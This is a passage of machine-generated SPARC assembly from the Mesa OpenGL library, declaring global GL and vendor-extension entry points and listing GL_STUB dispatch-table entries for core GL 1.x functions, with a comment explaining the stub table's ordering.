.globl glUseProgramObjectARB ; .type glUseProgramObjectARB,#function
.globl glValidateProgramARB ; .type glValidateProgramARB,#function
.globl glBindAttribLocationARB ; .type glBindAttribLocationARB,#function
.globl glGetActiveAttribARB ; .type glGetActiveAttribARB,#function
.globl glGetAttribLocationARB ; .type glGetAttribLocationARB,#function
.globl glDrawBuffersARB ; .type glDrawBuffersARB,#function
.globl glPolygonOffsetEXT ; .type glPolygonOffsetEXT,#function
.globl gl_dispatch_stub_562 ; .type gl_dispatch_stub_562,#function
.globl gl_dispatch_stub_563 ; .type gl_dispatch_stub_563,#function
.globl gl_dispatch_stub_564 ; .type gl_dispatch_stub_564,#function
.globl gl_dispatch_stub_565 ; .type gl_dispatch_stub_565,#function
.globl gl_dispatch_stub_566 ; .type gl_dispatch_stub_566,#function
.globl gl_dispatch_stub_567 ; .type gl_dispatch_stub_567,#function
.globl gl_dispatch_stub_568 ; .type gl_dispatch_stub_568,#function
.globl gl_dispatch_stub_569 ; .type gl_dispatch_stub_569,#function
.globl glColorPointerEXT ; .type glColorPointerEXT,#function
.globl glEdgeFlagPointerEXT ; .type glEdgeFlagPointerEXT,#function
.globl glIndexPointerEXT ; .type glIndexPointerEXT,#function
.globl glNormalPointerEXT ; .type glNormalPointerEXT,#function
.globl glTexCoordPointerEXT ; .type glTexCoordPointerEXT,#function
.globl glVertexPointerEXT ; .type glVertexPointerEXT,#function
.globl glPointParameterfEXT ; .type glPointParameterfEXT,#function
.globl glPointParameterfvEXT ; .type glPointParameterfvEXT,#function
.globl glLockArraysEXT ; .type glLockArraysEXT,#function
.globl glUnlockArraysEXT ; .type glUnlockArraysEXT,#function
.globl gl_dispatch_stub_580 ; .type gl_dispatch_stub_580,#function
.globl gl_dispatch_stub_581 ; .type gl_dispatch_stub_581,#function
.globl glSecondaryColor3bEXT ; .type glSecondaryColor3bEXT,#function
.globl glSecondaryColor3bvEXT ; .type glSecondaryColor3bvEXT,#function
.globl glSecondaryColor3dEXT ; .type glSecondaryColor3dEXT,#function
.globl glSecondaryColor3dvEXT ; .type glSecondaryColor3dvEXT,#function
.globl glSecondaryColor3fEXT ; .type glSecondaryColor3fEXT,#function
.globl glSecondaryColor3fvEXT ; .type glSecondaryColor3fvEXT,#function
.globl glSecondaryColor3iEXT ; .type glSecondaryColor3iEXT,#function
.globl glSecondaryColor3ivEXT ; .type glSecondaryColor3ivEXT,#function
.globl glSecondaryColor3sEXT ; .type glSecondaryColor3sEXT,#function
.globl glSecondaryColor3svEXT ; .type glSecondaryColor3svEXT,#function
.globl glSecondaryColor3ubEXT ; .type glSecondaryColor3ubEXT,#function
.globl glSecondaryColor3ubvEXT ; .type glSecondaryColor3ubvEXT,#function
.globl glSecondaryColor3uiEXT ; .type glSecondaryColor3uiEXT,#function
.globl glSecondaryColor3uivEXT ; .type glSecondaryColor3uivEXT,#function
.globl glSecondaryColor3usEXT ; .type glSecondaryColor3usEXT,#function
.globl glSecondaryColor3usvEXT ; .type glSecondaryColor3usvEXT,#function
.globl glSecondaryColorPointerEXT ; .type glSecondaryColorPointerEXT,#function
.globl glMultiDrawArraysEXT ; .type glMultiDrawArraysEXT,#function
.globl glMultiDrawElementsEXT ; .type glMultiDrawElementsEXT,#function
.globl glFogCoordPointerEXT ; .type glFogCoordPointerEXT,#function
.globl glFogCoorddEXT ; .type glFogCoorddEXT,#function
.globl glFogCoorddvEXT ; .type glFogCoorddvEXT,#function
.globl glFogCoordfEXT ; .type glFogCoordfEXT,#function
.globl glFogCoordfvEXT ; .type glFogCoordfvEXT,#function
.globl gl_dispatch_stub_606 ; .type gl_dispatch_stub_606,#function
.globl glBlendFuncSeparateEXT ; .type glBlendFuncSeparateEXT,#function
.globl glFlushVertexArrayRangeNV ; .type glFlushVertexArrayRangeNV,#function
.globl glVertexArrayRangeNV ; .type glVertexArrayRangeNV,#function
.globl glCombinerInputNV ; .type glCombinerInputNV,#function
.globl glCombinerOutputNV ; .type glCombinerOutputNV,#function
.globl glCombinerParameterfNV ; .type glCombinerParameterfNV,#function
.globl glCombinerParameterfvNV ; .type glCombinerParameterfvNV,#function
.globl glCombinerParameteriNV ; .type glCombinerParameteriNV,#function
.globl glCombinerParameterivNV ; .type glCombinerParameterivNV,#function
.globl glFinalCombinerInputNV ; .type glFinalCombinerInputNV,#function
.globl glGetCombinerInputParameterfvNV ; .type glGetCombinerInputParameterfvNV,#function
.globl glGetCombinerInputParameterivNV ; .type glGetCombinerInputParameterivNV,#function
.globl glGetCombinerOutputParameterfvNV ; .type glGetCombinerOutputParameterfvNV,#function
.globl glGetCombinerOutputParameterivNV ; .type glGetCombinerOutputParameterivNV,#function
.globl glGetFinalCombinerInputParameterfvNV ; .type glGetFinalCombinerInputParameterfvNV,#function
.globl glGetFinalCombinerInputParameterivNV ; .type glGetFinalCombinerInputParameterivNV,#function
.globl glResizeBuffersMESA ; .type glResizeBuffersMESA,#function
.globl glWindowPos2dMESA ; .type glWindowPos2dMESA,#function
.globl glWindowPos2dvMESA ; .type glWindowPos2dvMESA,#function
.globl glWindowPos2fMESA ; .type glWindowPos2fMESA,#function
.globl glWindowPos2fvMESA ; .type glWindowPos2fvMESA,#function
.globl glWindowPos2iMESA ; .type glWindowPos2iMESA,#function
.globl glWindowPos2ivMESA ; .type glWindowPos2ivMESA,#function
.globl glWindowPos2sMESA ; .type glWindowPos2sMESA,#function
.globl glWindowPos2svMESA ; .type glWindowPos2svMESA,#function
.globl glWindowPos3dMESA ; .type glWindowPos3dMESA,#function
.globl glWindowPos3dvMESA ; .type glWindowPos3dvMESA,#function
.globl glWindowPos3fMESA ; .type glWindowPos3fMESA,#function
.globl glWindowPos3fvMESA ; .type glWindowPos3fvMESA,#function
.globl glWindowPos3iMESA ; .type glWindowPos3iMESA,#function
.globl glWindowPos3ivMESA ; .type glWindowPos3ivMESA,#function
.globl glWindowPos3sMESA ; .type glWindowPos3sMESA,#function
.globl glWindowPos3svMESA ; .type glWindowPos3svMESA,#function
.globl glWindowPos4dMESA ; .type glWindowPos4dMESA,#function
.globl glWindowPos4dvMESA ; .type glWindowPos4dvMESA,#function
.globl glWindowPos4fMESA ; .type glWindowPos4fMESA,#function
.globl glWindowPos4fvMESA ; .type glWindowPos4fvMESA,#function
.globl glWindowPos4iMESA ; .type glWindowPos4iMESA,#function
.globl glWindowPos4ivMESA ; .type glWindowPos4ivMESA,#function
.globl glWindowPos4sMESA ; .type glWindowPos4sMESA,#function
.globl glWindowPos4svMESA ; .type glWindowPos4svMESA,#function
.globl gl_dispatch_stub_648 ; .type gl_dispatch_stub_648,#function
.globl gl_dispatch_stub_649 ; .type gl_dispatch_stub_649,#function
.globl gl_dispatch_stub_650 ; .type gl_dispatch_stub_650,#function
.globl gl_dispatch_stub_651 ; .type gl_dispatch_stub_651,#function
.globl gl_dispatch_stub_652 ; .type gl_dispatch_stub_652,#function
.globl gl_dispatch_stub_653 ; .type gl_dispatch_stub_653,#function
.globl gl_dispatch_stub_654 ; .type gl_dispatch_stub_654,#function
.globl gl_dispatch_stub_655 ; .type gl_dispatch_stub_655,#function
.globl gl_dispatch_stub_656 ; .type gl_dispatch_stub_656,#function
.globl glAreProgramsResidentNV ; .type glAreProgramsResidentNV,#function
.globl glBindProgramNV ; .type glBindProgramNV,#function
.globl glDeleteProgramsNV ; .type glDeleteProgramsNV,#function
.globl glExecuteProgramNV ; .type glExecuteProgramNV,#function
.globl glGenProgramsNV ; .type glGenProgramsNV,#function
.globl glGetProgramParameterdvNV ; .type glGetProgramParameterdvNV,#function
.globl glGetProgramParameterfvNV ; .type glGetProgramParameterfvNV,#function
.globl glGetProgramStringNV ; .type glGetProgramStringNV,#function
.globl glGetProgramivNV ; .type glGetProgramivNV,#function
.globl glGetTrackMatrixivNV ; .type glGetTrackMatrixivNV,#function
.globl glGetVertexAttribPointervNV ; .type glGetVertexAttribPointervNV,#function
.globl glGetVertexAttribdvNV ; .type glGetVertexAttribdvNV,#function
.globl glGetVertexAttribfvNV ; .type glGetVertexAttribfvNV,#function
.globl glGetVertexAttribivNV ; .type glGetVertexAttribivNV,#function
.globl glIsProgramNV ; .type glIsProgramNV,#function
.globl glLoadProgramNV ; .type glLoadProgramNV,#function
.globl glProgramParameters4dvNV ; .type glProgramParameters4dvNV,#function
.globl glProgramParameters4fvNV ; .type glProgramParameters4fvNV,#function
.globl glRequestResidentProgramsNV ; .type glRequestResidentProgramsNV,#function
.globl glTrackMatrixNV ; .type glTrackMatrixNV,#function
.globl glVertexAttrib1dNV ; .type glVertexAttrib1dNV,#function
.globl glVertexAttrib1dvNV ; .type glVertexAttrib1dvNV,#function
.globl glVertexAttrib1fNV ; .type glVertexAttrib1fNV,#function
.globl glVertexAttrib1fvNV ; .type glVertexAttrib1fvNV,#function
.globl glVertexAttrib1sNV ; .type glVertexAttrib1sNV,#function
.globl glVertexAttrib1svNV ; .type glVertexAttrib1svNV,#function
.globl glVertexAttrib2dNV ; .type glVertexAttrib2dNV,#function
.globl glVertexAttrib2dvNV ; .type glVertexAttrib2dvNV,#function
.globl glVertexAttrib2fNV ; .type glVertexAttrib2fNV,#function
.globl glVertexAttrib2fvNV ; .type glVertexAttrib2fvNV,#function
.globl glVertexAttrib2sNV ; .type glVertexAttrib2sNV,#function
.globl glVertexAttrib2svNV ; .type glVertexAttrib2svNV,#function
.globl glVertexAttrib3dNV ; .type glVertexAttrib3dNV,#function
.globl glVertexAttrib3dvNV ; .type glVertexAttrib3dvNV,#function
.globl glVertexAttrib3fNV ; .type glVertexAttrib3fNV,#function
.globl glVertexAttrib3fvNV ; .type glVertexAttrib3fvNV,#function
.globl glVertexAttrib3sNV ; .type glVertexAttrib3sNV,#function
.globl glVertexAttrib3svNV ; .type glVertexAttrib3svNV,#function
.globl glVertexAttrib4dNV ; .type glVertexAttrib4dNV,#function
.globl glVertexAttrib4dvNV ; .type glVertexAttrib4dvNV,#function
.globl glVertexAttrib4fNV ; .type glVertexAttrib4fNV,#function
.globl glVertexAttrib4fvNV ; .type glVertexAttrib4fvNV,#function
.globl glVertexAttrib4sNV ; .type glVertexAttrib4sNV,#function
.globl glVertexAttrib4svNV ; .type glVertexAttrib4svNV,#function
.globl glVertexAttrib4ubNV ; .type glVertexAttrib4ubNV,#function
.globl glVertexAttrib4ubvNV ; .type glVertexAttrib4ubvNV,#function
.globl glVertexAttribPointerNV ; .type glVertexAttribPointerNV,#function
.globl glVertexAttribs1dvNV ; .type glVertexAttribs1dvNV,#function
.globl glVertexAttribs1fvNV ; .type glVertexAttribs1fvNV,#function
.globl glVertexAttribs1svNV ; .type glVertexAttribs1svNV,#function
.globl glVertexAttribs2dvNV ; .type glVertexAttribs2dvNV,#function
.globl glVertexAttribs2fvNV ; .type glVertexAttribs2fvNV,#function
.globl glVertexAttribs2svNV ; .type glVertexAttribs2svNV,#function
.globl glVertexAttribs3dvNV ; .type glVertexAttribs3dvNV,#function
.globl glVertexAttribs3fvNV ; .type glVertexAttribs3fvNV,#function
.globl glVertexAttribs3svNV ; .type glVertexAttribs3svNV,#function
.globl glVertexAttribs4dvNV ; .type glVertexAttribs4dvNV,#function
.globl glVertexAttribs4fvNV ; .type glVertexAttribs4fvNV,#function
.globl glVertexAttribs4svNV ; .type glVertexAttribs4svNV,#function
.globl glVertexAttribs4ubvNV ; .type glVertexAttribs4ubvNV,#function
.globl glAlphaFragmentOp1ATI ; .type glAlphaFragmentOp1ATI,#function
.globl glAlphaFragmentOp2ATI ; .type glAlphaFragmentOp2ATI,#function
.globl glAlphaFragmentOp3ATI ; .type glAlphaFragmentOp3ATI,#function
.globl glBeginFragmentShaderATI ; .type glBeginFragmentShaderATI,#function
.globl glBindFragmentShaderATI ; .type glBindFragmentShaderATI,#function
.globl glColorFragmentOp1ATI ; .type glColorFragmentOp1ATI,#function
.globl glColorFragmentOp2ATI ; .type glColorFragmentOp2ATI,#function
.globl glColorFragmentOp3ATI ; .type glColorFragmentOp3ATI,#function
.globl glDeleteFragmentShaderATI ; .type glDeleteFragmentShaderATI,#function
.globl glEndFragmentShaderATI ; .type glEndFragmentShaderATI,#function
.globl glGenFragmentShadersATI ; .type glGenFragmentShadersATI,#function
.globl glPassTexCoordATI ; .type glPassTexCoordATI,#function
.globl glSampleMapATI ; .type glSampleMapATI,#function
.globl glSetFragmentShaderConstantATI ; .type glSetFragmentShaderConstantATI,#function
.globl glPointParameteriNV ; .type glPointParameteriNV,#function
.globl glPointParameterivNV ; .type glPointParameterivNV,#function
.globl gl_dispatch_stub_733 ; .type gl_dispatch_stub_733,#function
.globl gl_dispatch_stub_734 ; .type gl_dispatch_stub_734,#function
.globl gl_dispatch_stub_735 ; .type gl_dispatch_stub_735,#function
.globl gl_dispatch_stub_736 ; .type gl_dispatch_stub_736,#function
.globl gl_dispatch_stub_737 ; .type gl_dispatch_stub_737,#function
.globl glGetProgramNamedParameterdvNV ; .type glGetProgramNamedParameterdvNV,#function
.globl glGetProgramNamedParameterfvNV ; .type glGetProgramNamedParameterfvNV,#function
.globl glProgramNamedParameter4dNV ; .type glProgramNamedParameter4dNV,#function
.globl glProgramNamedParameter4dvNV ; .type glProgramNamedParameter4dvNV,#function
.globl glProgramNamedParameter4fNV ; .type glProgramNamedParameter4fNV,#function
.globl glProgramNamedParameter4fvNV ; .type glProgramNamedParameter4fvNV,#function
.globl gl_dispatch_stub_744 ; .type gl_dispatch_stub_744,#function
.globl gl_dispatch_stub_745 ; .type gl_dispatch_stub_745,#function
.globl glBindFramebufferEXT ; .type glBindFramebufferEXT,#function
.globl glBindRenderbufferEXT ; .type glBindRenderbufferEXT,#function
.globl glCheckFramebufferStatusEXT ; .type glCheckFramebufferStatusEXT,#function
.globl glDeleteFramebuffersEXT ; .type glDeleteFramebuffersEXT,#function
.globl glDeleteRenderbuffersEXT ; .type glDeleteRenderbuffersEXT,#function
.globl glFramebufferRenderbufferEXT ; .type glFramebufferRenderbufferEXT,#function
.globl glFramebufferTexture1DEXT ; .type glFramebufferTexture1DEXT,#function
.globl glFramebufferTexture2DEXT ; .type glFramebufferTexture2DEXT,#function
.globl glFramebufferTexture3DEXT ; .type glFramebufferTexture3DEXT,#function
.globl glGenFramebuffersEXT ; .type glGenFramebuffersEXT,#function
.globl glGenRenderbuffersEXT ; .type glGenRenderbuffersEXT,#function
.globl glGenerateMipmapEXT ; .type glGenerateMipmapEXT,#function
.globl glGetFramebufferAttachmentParameterivEXT ; .type glGetFramebufferAttachmentParameterivEXT,#function
.globl glGetRenderbufferParameterivEXT ; .type glGetRenderbufferParameterivEXT,#function
.globl glIsFramebufferEXT ; .type glIsFramebufferEXT,#function
.globl glIsRenderbufferEXT ; .type glIsRenderbufferEXT,#function
.globl glRenderbufferStorageEXT ; .type glRenderbufferStorageEXT,#function
.globl gl_dispatch_stub_763 ; .type gl_dispatch_stub_763,#function
.globl glFramebufferTextureLayerEXT ; .type glFramebufferTextureLayerEXT,#function
.globl gl_dispatch_stub_765 ; .type gl_dispatch_stub_765,#function
.globl gl_dispatch_stub_766 ; .type gl_dispatch_stub_766,#function
.globl gl_dispatch_stub_767 ; .type gl_dispatch_stub_767,#function
.globl gl_dispatch_stub_768 ; .type gl_dispatch_stub_768,#function
.globl gl_dispatch_stub_769 ; .type gl_dispatch_stub_769,#function
.globl _mesa_sparc_glapi_begin ; .type _mesa_sparc_glapi_begin,#function
/*
 * _mesa_sparc_glapi_begin: start-of-table marker for the block of GL
 * dispatch stubs emitted below (machine generated — do not reorder).
 *
 * Each GL_STUB(name, offset) invocation expands (via a macro defined
 * earlier in the file, outside this view) to the stub body for one GL
 * entry point; the second argument is the function's slot offset in the
 * dispatch table.  The stubs MUST appear in dispatch-offset order and
 * each must expand to the same fixed size, because other code computes
 * stub addresses relative to _mesa_sparc_glapi_begin.
 *
 * NOTE(review): the stub table continues past the end of this chunk;
 * only the display-list through GL 1.1 state-query entries are visible
 * here.
 */
_mesa_sparc_glapi_begin:

GL_STUB(glNewList, _gloffset_NewList)
GL_STUB(glEndList, _gloffset_EndList)
GL_STUB(glCallList, _gloffset_CallList)
GL_STUB(glCallLists, _gloffset_CallLists)
GL_STUB(glDeleteLists, _gloffset_DeleteLists)
GL_STUB(glGenLists, _gloffset_GenLists)
GL_STUB(glListBase, _gloffset_ListBase)
GL_STUB(glBegin, _gloffset_Begin)
GL_STUB(glBitmap, _gloffset_Bitmap)
GL_STUB(glColor3b, _gloffset_Color3b)
GL_STUB(glColor3bv, _gloffset_Color3bv)
GL_STUB(glColor3d, _gloffset_Color3d)
GL_STUB(glColor3dv, _gloffset_Color3dv)
GL_STUB(glColor3f, _gloffset_Color3f)
GL_STUB(glColor3fv, _gloffset_Color3fv)
GL_STUB(glColor3i, _gloffset_Color3i)
GL_STUB(glColor3iv, _gloffset_Color3iv)
GL_STUB(glColor3s, _gloffset_Color3s)
GL_STUB(glColor3sv, _gloffset_Color3sv)
GL_STUB(glColor3ub, _gloffset_Color3ub)
GL_STUB(glColor3ubv, _gloffset_Color3ubv)
GL_STUB(glColor3ui, _gloffset_Color3ui)
GL_STUB(glColor3uiv, _gloffset_Color3uiv)
GL_STUB(glColor3us, _gloffset_Color3us)
GL_STUB(glColor3usv, _gloffset_Color3usv)
GL_STUB(glColor4b, _gloffset_Color4b)
GL_STUB(glColor4bv, _gloffset_Color4bv)
GL_STUB(glColor4d, _gloffset_Color4d)
GL_STUB(glColor4dv, _gloffset_Color4dv)
GL_STUB(glColor4f, _gloffset_Color4f)
GL_STUB(glColor4fv, _gloffset_Color4fv)
GL_STUB(glColor4i, _gloffset_Color4i)
GL_STUB(glColor4iv, _gloffset_Color4iv)
GL_STUB(glColor4s, _gloffset_Color4s)
GL_STUB(glColor4sv, _gloffset_Color4sv)
GL_STUB(glColor4ub, _gloffset_Color4ub)
GL_STUB(glColor4ubv, _gloffset_Color4ubv)
GL_STUB(glColor4ui, _gloffset_Color4ui)
GL_STUB(glColor4uiv, _gloffset_Color4uiv)
GL_STUB(glColor4us, _gloffset_Color4us)
GL_STUB(glColor4usv, _gloffset_Color4usv)
GL_STUB(glEdgeFlag, _gloffset_EdgeFlag)
GL_STUB(glEdgeFlagv, _gloffset_EdgeFlagv)
GL_STUB(glEnd, _gloffset_End)
GL_STUB(glIndexd, _gloffset_Indexd)
GL_STUB(glIndexdv, _gloffset_Indexdv)
GL_STUB(glIndexf, _gloffset_Indexf)
GL_STUB(glIndexfv, _gloffset_Indexfv)
GL_STUB(glIndexi, _gloffset_Indexi)
GL_STUB(glIndexiv, _gloffset_Indexiv)
GL_STUB(glIndexs, _gloffset_Indexs)
GL_STUB(glIndexsv, _gloffset_Indexsv)
GL_STUB(glNormal3b, _gloffset_Normal3b)
GL_STUB(glNormal3bv, _gloffset_Normal3bv)
GL_STUB(glNormal3d, _gloffset_Normal3d)
GL_STUB(glNormal3dv, _gloffset_Normal3dv)
GL_STUB(glNormal3f, _gloffset_Normal3f)
GL_STUB(glNormal3fv, _gloffset_Normal3fv)
GL_STUB(glNormal3i, _gloffset_Normal3i)
GL_STUB(glNormal3iv, _gloffset_Normal3iv)
GL_STUB(glNormal3s, _gloffset_Normal3s)
GL_STUB(glNormal3sv, _gloffset_Normal3sv)
GL_STUB(glRasterPos2d, _gloffset_RasterPos2d)
GL_STUB(glRasterPos2dv, _gloffset_RasterPos2dv)
GL_STUB(glRasterPos2f, _gloffset_RasterPos2f)
GL_STUB(glRasterPos2fv, _gloffset_RasterPos2fv)
GL_STUB(glRasterPos2i, _gloffset_RasterPos2i)
GL_STUB(glRasterPos2iv, _gloffset_RasterPos2iv)
GL_STUB(glRasterPos2s, _gloffset_RasterPos2s)
GL_STUB(glRasterPos2sv, _gloffset_RasterPos2sv)
GL_STUB(glRasterPos3d, _gloffset_RasterPos3d)
GL_STUB(glRasterPos3dv, _gloffset_RasterPos3dv)
GL_STUB(glRasterPos3f, _gloffset_RasterPos3f)
GL_STUB(glRasterPos3fv, _gloffset_RasterPos3fv)
GL_STUB(glRasterPos3i, _gloffset_RasterPos3i)
GL_STUB(glRasterPos3iv, _gloffset_RasterPos3iv)
GL_STUB(glRasterPos3s, _gloffset_RasterPos3s)
GL_STUB(glRasterPos3sv, _gloffset_RasterPos3sv)
GL_STUB(glRasterPos4d, _gloffset_RasterPos4d)
GL_STUB(glRasterPos4dv, _gloffset_RasterPos4dv)
GL_STUB(glRasterPos4f, _gloffset_RasterPos4f)
GL_STUB(glRasterPos4fv, _gloffset_RasterPos4fv)
GL_STUB(glRasterPos4i, _gloffset_RasterPos4i)
GL_STUB(glRasterPos4iv, _gloffset_RasterPos4iv)
GL_STUB(glRasterPos4s, _gloffset_RasterPos4s)
GL_STUB(glRasterPos4sv, _gloffset_RasterPos4sv)
GL_STUB(glRectd, _gloffset_Rectd)
GL_STUB(glRectdv, _gloffset_Rectdv)
GL_STUB(glRectf, _gloffset_Rectf)
GL_STUB(glRectfv, _gloffset_Rectfv)
GL_STUB(glRecti, _gloffset_Recti)
GL_STUB(glRectiv, _gloffset_Rectiv)
GL_STUB(glRects, _gloffset_Rects)
GL_STUB(glRectsv, _gloffset_Rectsv)
GL_STUB(glTexCoord1d, _gloffset_TexCoord1d)
GL_STUB(glTexCoord1dv, _gloffset_TexCoord1dv)
GL_STUB(glTexCoord1f, _gloffset_TexCoord1f)
GL_STUB(glTexCoord1fv, _gloffset_TexCoord1fv)
GL_STUB(glTexCoord1i, _gloffset_TexCoord1i)
GL_STUB(glTexCoord1iv, _gloffset_TexCoord1iv)
GL_STUB(glTexCoord1s, _gloffset_TexCoord1s)
GL_STUB(glTexCoord1sv, _gloffset_TexCoord1sv)
GL_STUB(glTexCoord2d, _gloffset_TexCoord2d)
GL_STUB(glTexCoord2dv, _gloffset_TexCoord2dv)
GL_STUB(glTexCoord2f, _gloffset_TexCoord2f)
GL_STUB(glTexCoord2fv, _gloffset_TexCoord2fv)
GL_STUB(glTexCoord2i, _gloffset_TexCoord2i)
GL_STUB(glTexCoord2iv, _gloffset_TexCoord2iv)
GL_STUB(glTexCoord2s, _gloffset_TexCoord2s)
GL_STUB(glTexCoord2sv, _gloffset_TexCoord2sv)
GL_STUB(glTexCoord3d, _gloffset_TexCoord3d)
GL_STUB(glTexCoord3dv, _gloffset_TexCoord3dv)
GL_STUB(glTexCoord3f, _gloffset_TexCoord3f)
GL_STUB(glTexCoord3fv, _gloffset_TexCoord3fv)
GL_STUB(glTexCoord3i, _gloffset_TexCoord3i)
GL_STUB(glTexCoord3iv, _gloffset_TexCoord3iv)
GL_STUB(glTexCoord3s, _gloffset_TexCoord3s)
GL_STUB(glTexCoord3sv, _gloffset_TexCoord3sv)
GL_STUB(glTexCoord4d, _gloffset_TexCoord4d)
GL_STUB(glTexCoord4dv, _gloffset_TexCoord4dv)
GL_STUB(glTexCoord4f, _gloffset_TexCoord4f)
GL_STUB(glTexCoord4fv, _gloffset_TexCoord4fv)
GL_STUB(glTexCoord4i, _gloffset_TexCoord4i)
GL_STUB(glTexCoord4iv, _gloffset_TexCoord4iv)
GL_STUB(glTexCoord4s, _gloffset_TexCoord4s)
GL_STUB(glTexCoord4sv, _gloffset_TexCoord4sv)
GL_STUB(glVertex2d, _gloffset_Vertex2d)
GL_STUB(glVertex2dv, _gloffset_Vertex2dv)
GL_STUB(glVertex2f, _gloffset_Vertex2f)
GL_STUB(glVertex2fv, _gloffset_Vertex2fv)
GL_STUB(glVertex2i, _gloffset_Vertex2i)
GL_STUB(glVertex2iv, _gloffset_Vertex2iv)
GL_STUB(glVertex2s, _gloffset_Vertex2s)
GL_STUB(glVertex2sv, _gloffset_Vertex2sv)
GL_STUB(glVertex3d, _gloffset_Vertex3d)
GL_STUB(glVertex3dv, _gloffset_Vertex3dv)
GL_STUB(glVertex3f, _gloffset_Vertex3f)
GL_STUB(glVertex3fv, _gloffset_Vertex3fv)
GL_STUB(glVertex3i, _gloffset_Vertex3i)
GL_STUB(glVertex3iv, _gloffset_Vertex3iv)
GL_STUB(glVertex3s, _gloffset_Vertex3s)
GL_STUB(glVertex3sv, _gloffset_Vertex3sv)
GL_STUB(glVertex4d, _gloffset_Vertex4d)
GL_STUB(glVertex4dv, _gloffset_Vertex4dv)
GL_STUB(glVertex4f, _gloffset_Vertex4f)
GL_STUB(glVertex4fv, _gloffset_Vertex4fv)
GL_STUB(glVertex4i, _gloffset_Vertex4i)
GL_STUB(glVertex4iv, _gloffset_Vertex4iv)
GL_STUB(glVertex4s, _gloffset_Vertex4s)
GL_STUB(glVertex4sv, _gloffset_Vertex4sv)
GL_STUB(glClipPlane, _gloffset_ClipPlane)
GL_STUB(glColorMaterial, _gloffset_ColorMaterial)
GL_STUB(glCullFace, _gloffset_CullFace)
GL_STUB(glFogf, _gloffset_Fogf)
GL_STUB(glFogfv, _gloffset_Fogfv)
GL_STUB(glFogi, _gloffset_Fogi)
GL_STUB(glFogiv, _gloffset_Fogiv)
GL_STUB(glFrontFace, _gloffset_FrontFace)
GL_STUB(glHint, _gloffset_Hint)
GL_STUB(glLightf, _gloffset_Lightf)
GL_STUB(glLightfv, _gloffset_Lightfv)
GL_STUB(glLighti, _gloffset_Lighti)
GL_STUB(glLightiv, _gloffset_Lightiv)
GL_STUB(glLightModelf, _gloffset_LightModelf)
GL_STUB(glLightModelfv, _gloffset_LightModelfv)
GL_STUB(glLightModeli, _gloffset_LightModeli)
GL_STUB(glLightModeliv, _gloffset_LightModeliv)
GL_STUB(glLineStipple, _gloffset_LineStipple)
GL_STUB(glLineWidth, _gloffset_LineWidth)
GL_STUB(glMaterialf, _gloffset_Materialf)
GL_STUB(glMaterialfv, _gloffset_Materialfv)
GL_STUB(glMateriali, _gloffset_Materiali)
GL_STUB(glMaterialiv, _gloffset_Materialiv)
GL_STUB(glPointSize, _gloffset_PointSize)
GL_STUB(glPolygonMode, _gloffset_PolygonMode)
GL_STUB(glPolygonStipple, _gloffset_PolygonStipple)
GL_STUB(glScissor, _gloffset_Scissor)
GL_STUB(glShadeModel, _gloffset_ShadeModel)
GL_STUB(glTexParameterf, _gloffset_TexParameterf)
GL_STUB(glTexParameterfv, _gloffset_TexParameterfv)
GL_STUB(glTexParameteri, _gloffset_TexParameteri)
GL_STUB(glTexParameteriv, _gloffset_TexParameteriv)
GL_STUB(glTexImage1D, _gloffset_TexImage1D)
GL_STUB(glTexImage2D, _gloffset_TexImage2D)
GL_STUB(glTexEnvf, _gloffset_TexEnvf)
GL_STUB(glTexEnvfv, _gloffset_TexEnvfv)
GL_STUB(glTexEnvi, _gloffset_TexEnvi)
GL_STUB(glTexEnviv, _gloffset_TexEnviv)
GL_STUB(glTexGend, _gloffset_TexGend)
GL_STUB(glTexGendv, _gloffset_TexGendv)
GL_STUB(glTexGenf, _gloffset_TexGenf)
GL_STUB(glTexGenfv, _gloffset_TexGenfv)
GL_STUB(glTexGeni, _gloffset_TexGeni)
GL_STUB(glTexGeniv, _gloffset_TexGeniv)
GL_STUB(glFeedbackBuffer, _gloffset_FeedbackBuffer)
GL_STUB(glSelectBuffer, _gloffset_SelectBuffer)
GL_STUB(glRenderMode, _gloffset_RenderMode)
GL_STUB(glInitNames, _gloffset_InitNames)
GL_STUB(glLoadName, _gloffset_LoadName)
GL_STUB(glPassThrough, _gloffset_PassThrough)
GL_STUB(glPopName, _gloffset_PopName)
GL_STUB(glPushName, _gloffset_PushName)
GL_STUB(glDrawBuffer, _gloffset_DrawBuffer)
GL_STUB(glClear, _gloffset_Clear)
GL_STUB(glClearAccum, _gloffset_ClearAccum)
GL_STUB(glClearIndex, _gloffset_ClearIndex)
GL_STUB(glClearColor, _gloffset_ClearColor)
GL_STUB(glClearStencil, _gloffset_ClearStencil)
GL_STUB(glClearDepth, _gloffset_ClearDepth)
GL_STUB(glStencilMask, _gloffset_StencilMask)
GL_STUB(glColorMask, _gloffset_ColorMask)
GL_STUB(glDepthMask, _gloffset_DepthMask)
GL_STUB(glIndexMask, _gloffset_IndexMask)
GL_STUB(glAccum, _gloffset_Accum)
GL_STUB(glDisable, _gloffset_Disable)
GL_STUB(glEnable, _gloffset_Enable)
GL_STUB(glFinish, _gloffset_Finish)
GL_STUB(glFlush, _gloffset_Flush)
GL_STUB(glPopAttrib, _gloffset_PopAttrib)
GL_STUB(glPushAttrib, _gloffset_PushAttrib)
GL_STUB(glMap1d, _gloffset_Map1d)
GL_STUB(glMap1f, _gloffset_Map1f)
GL_STUB(glMap2d, _gloffset_Map2d)
GL_STUB(glMap2f, _gloffset_Map2f)
GL_STUB(glMapGrid1d, _gloffset_MapGrid1d)
GL_STUB(glMapGrid1f, _gloffset_MapGrid1f)
GL_STUB(glMapGrid2d, _gloffset_MapGrid2d)
GL_STUB(glMapGrid2f, _gloffset_MapGrid2f)
GL_STUB(glEvalCoord1d, _gloffset_EvalCoord1d)
GL_STUB(glEvalCoord1dv, _gloffset_EvalCoord1dv)
GL_STUB(glEvalCoord1f, _gloffset_EvalCoord1f)
GL_STUB(glEvalCoord1fv, _gloffset_EvalCoord1fv)
GL_STUB(glEvalCoord2d, _gloffset_EvalCoord2d)
GL_STUB(glEvalCoord2dv, _gloffset_EvalCoord2dv)
GL_STUB(glEvalCoord2f, _gloffset_EvalCoord2f)
GL_STUB(glEvalCoord2fv, _gloffset_EvalCoord2fv)
GL_STUB(glEvalMesh1, _gloffset_EvalMesh1)
GL_STUB(glEvalPoint1, _gloffset_EvalPoint1)
GL_STUB(glEvalMesh2, _gloffset_EvalMesh2)
GL_STUB(glEvalPoint2, _gloffset_EvalPoint2)
GL_STUB(glAlphaFunc, _gloffset_AlphaFunc)
GL_STUB(glBlendFunc, _gloffset_BlendFunc)
GL_STUB(glLogicOp, _gloffset_LogicOp)
GL_STUB(glStencilFunc, _gloffset_StencilFunc)
